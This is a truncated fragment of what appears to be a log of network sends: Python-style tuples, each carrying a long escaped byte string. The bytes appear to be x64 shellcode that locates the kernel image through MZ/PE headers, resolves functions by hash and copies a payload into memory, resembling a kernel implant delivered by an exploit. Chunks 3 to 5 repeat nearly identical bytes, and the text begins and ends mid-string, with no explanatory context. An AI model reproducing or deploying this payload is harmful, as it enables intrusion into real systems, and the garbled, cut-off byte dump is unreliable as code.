\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', \"('send', 3, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 4, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\